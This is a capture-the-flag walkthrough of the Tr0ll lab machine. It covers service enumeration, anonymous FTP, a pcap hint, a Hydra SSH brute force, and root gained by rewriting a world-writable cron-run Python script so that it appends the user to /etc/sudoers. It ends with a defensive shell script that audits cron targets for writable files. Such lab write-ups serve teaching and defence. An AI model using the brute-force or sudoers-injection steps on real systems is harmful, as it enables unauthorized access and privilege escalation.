Our initial scan yields:
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
We’ll enumerate these three services to get a good understanding of the possible vectors, widening our attack surface and reducing time wasted in rabbit holes.
Starting with FTP, we can verify that it really is a vsftpd service and that it allows anonymous login.
root@kali:/usr/share/nmap/scripts# nmap -sV 192.168.72.138
root@kali:/usr/share/nmap/scripts# nmap --script ftp-anon.nse 192.168.72.138 -p21
Our initial scan was correct. We can now log in anonymously over FTP to do some initial investigation.
root@kali:/home# ftp 192.168.72.138
Connected to 192.168.72.138.
220 (vsFTPd 3.0.2)
Name (192.168.72.138:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10  2014 .
drwxr-xr-x    2 0        112          4096 Aug 10  2014 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.
Trying to PUT or traverse into other directories is futile, but all hope is not lost. We are able to capture a lone file: lol.pcap
We are able to GET this file and save it to our local machine. Before we commit to this vector, we’ll enumerate the other services - we can put this at the top of our todo list.
Since SSH is a common and relatively secure service, we won’t consider this a low hanging fruit.
We can verify the SSH service and check whether the root user accepts passwords (which it does).
root@kali:/# nmap -sV 192.168.72.138 -p22
root@kali:/# ssh -vvv firstname.lastname@example.org
We can try to brute force ssh as root, but we’ll put that near the end of the list.
Running Nikto, a few things come up, but nothing really juicy:
- OS: Ubuntu
- 1 entry in robots.txt: /secret
- Apache default README page
- Two images with pages /index.html & /secret/index.html
We can use curl to verify headers and check if anything jumps out at us.
root@kali:/# curl -i -L 192.168.72.138
root@kali:/# curl -i -L 192.168.72.138/secret
root@kali:/# curl -i -L 192.168.72.138/robots.txt
Nothing really. Let’s brute force some directories.
root@kali:/# dirb http://192.168.72.138
root@kali:/# gobuster -u http://192.168.72.138 -e -s '200,403,204,500' -w /usr/share/seclists/Discovery/Web_Content/apache.txt
Just what we’ve found from Nikto.
We can always run some larger wordlists to dig into the webserver more - we can put that on our todo list near the end as well.
Plan of Attack
- Investigate lol.pcap
- Brute force SSH with root or found usernames
- Run large wordlist (which we can do in the background)
We’ve downloaded the lol.pcap file, which we can open up with Wireshark.
Following the TCP stream in this packet capture gives you an idea of what the file contains. Make sure to remove the filter to see the important part:
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P Sucks, you were so close... gotta TRY HARDER!
Going to http://192.168.72.138/sup3rs3cr3tdirlol gives us a directory listing containing an ELF file named roflmao.
Downloading it to our local machine and digging into it, we see a hint.
root@kali:~/Downloads# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
root@kali:~/Downloads# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
“Find address 0x0856BF to proceed.” Using this string as a directory, we find another list of files.
Two folders with two files. One looks like a good user list and the other folder “this_folder_contains_the_password” has a file of “Pass.txt” containing the string: Good_job_:)
Trying the newly created user list (tru.txt) with the password string should yield a successful SSH login, correct? Or maybe via FTP? Wrong (I tried).
Since the name of this machine is tr0ll, and we’ve seen it be sneaky previously, we can take a step back and look at the file directory. Nothing is hidden in the headers or source, but take a look at this again: this_folder_contains_the_password/
“this_folder” - so the string pass.txt would technically be it, right? We’ll see…
root@kali:/# hydra -t 7 -L /home/tru.txt -p Pass.txt 192.168.72.138 ssh
..SNIP..
[ssh] host: 192.168.72.138   login: overflow   password: Pass.txt
A successful hit overflow:Pass.txt
Logging in with the creds, we have a limited low-privilege shell. Going through the basic Linux privilege escalation guide, we get to a point where we can search for world-writable folders.
$ find / -writable -type d 2>/dev/null
/tmp
/run/user/1002
/run/shm
/run/lock
/var/tmp
/sys/fs/cgroup/systemd/user/1002.user/14.session
/proc/4184/task/4184/fd
/proc/4184/fd
/proc/4184/map_files
Nothing in the /tmp folder, but something in the /var/tmp folder. An app called cleaner.py (which isn’t stock) is somewhere on the box, with a hint that it is run by a root cron job every 2 minutes.
$ cd /var/log
$ cat cronlog
*/2 * * * * cleaner.py
So let’s try to find this cleaner Python app. A basic locate or find command doesn’t bring us any luck, but the find command below (with the glob quoted so the shell doesn’t expand it locally) does yield something.
$ find / -name '*cleaner*' 2>/dev/null | grep cleaner.py
Looks like it’s located in /lib/log/cleaner.py AND it’s world writable. Since it’s executed by root, we can alter the script to add our low priv user to the /etc/sudoers file.
#!/usr/bin/env python
import os
import sys
try:
    os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
    sys.exit()
Save it, wait the 2 minutes per the cronlog, then:
$ sudo su
sudo: unable to resolve host troll
[sudo] password for overflow:
root@troll:~# whoami
root
root@troll:~# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
Good stuff, we have root.
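The root cause of this escalation is a script that root’s cron runs from a world-writable location. As an added example that is not part of the original write-up, the POSIX shell audit below walks a system-crontab file, resolves each job’s executable against a supplied search path (standing in for cron’s PATH), and flags targets that are group- or world-writable or that sit in a world-writable directory without the sticky bit; demo_audit stages a constructed tree mirroring this box (a mode-777 cleaner.py next to a sane script) to exercise it.

```shell
# Added example (not from the write-up): audit cron jobs for targets an unprivileged user could edit or replace.
# resolve_cmd NAME SEARCHPATH: first SEARCHPATH dir holding NAME, standing in for cron's
# PATH when a job names a bare script such as "cleaner.py"; echoes NAME itself if not found.
resolve_cmd() {
    rest="$2"
    while [ -n "$rest" ]; do
        d="${rest%%:*}"; case "$rest" in *:*) rest="${rest#*:}" ;; *) rest="" ;; esac
        [ -f "$d/$1" ] && { echo "$d/$1"; return 0; }
    done
    echo "$1"
}

# check_cron_target FILE: print "RISK <reason> <file>" per weakness found; returns 1 if any.
# Reads the ls -ld mode string ("-rwxrwxrwx"): char 6 group write, 9 other write, 10 sticky.
check_cron_target() {
    f="$1"; bad=0
    [ -e "$f" ] || { echo "WARN missing $f"; return 0; }
    perm=$(ls -ld "$f"); dperm=$(ls -ld "$(dirname "$f")")
    case "$perm" in ?????w*) echo "RISK group-writable $f"; bad=1 ;; esac
    case "$perm" in ????????w*) echo "RISK world-writable $f"; bad=1 ;; esac
    # world-writable parent without the sticky bit: anyone can replace the file outright
    case "$dperm" in ????????w[!tT]*) echo "RISK replaceable-dir $f"; bad=1 ;; esac
    return $bad
}

# audit_crontab FILE SEARCHPATH: system-crontab lines "m h dom mon dow user cmd"; a line with
# a single token after the schedule (like the cronlog above) is a bare command. Returns 1 if flagged.
audit_crontab() {
    file="$1"; spath="$2"; rc=0; set -f                          # -f: schedule fields are not globs
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac  # blanks, comments, VAR=val
        set -- $line
        case "$1" in @*) n=1 ;; *) n=5 ;; esac                   # width of the schedule
        [ $# -gt "$n" ] || continue
        shift "$n"; [ $# -ge 2 ] && shift                        # drop the user field
        case "$1" in */*) t="$1" ;; *) t=$(resolve_cmd "$1" "$spath") ;; esac
        check_cron_target "$t" || rc=1
    done < "$file"
    set +f; return $rc
}

# demo_audit: stage a constructed tree like the write-up's (mode-777 cleaner.py under lib/log,
# a sane script under bin) plus a constructed crontab, then audit it.
demo_audit() {
    s=$(mktemp -d); mkdir -p "$s/lib/log" "$s/bin"; chmod 755 "$s/lib/log" "$s/bin"
    printf '#!/usr/bin/env python\nimport os\n' > "$s/lib/log/cleaner.py"; chmod 777 "$s/lib/log/cleaner.py"
    printf '#!/bin/sh\nexit 0\n' > "$s/bin/safe.sh"; chmod 755 "$s/bin/safe.sh"
    printf '*/2 * * * * cleaner.py\n0 3 * * * root %s\n' "$s/bin/safe.sh" > "$s/crontab"
    if audit_crontab "$s/crontab" "$s/lib/log:$s/bin"; then rc=0; else rc=1; fi
    rm -rf "$s"; return $rc
}
```

On a real host, point audit_crontab at /etc/crontab and each file under /etc/cron.d with the PATH those files set; a clean run prints nothing and returns 0.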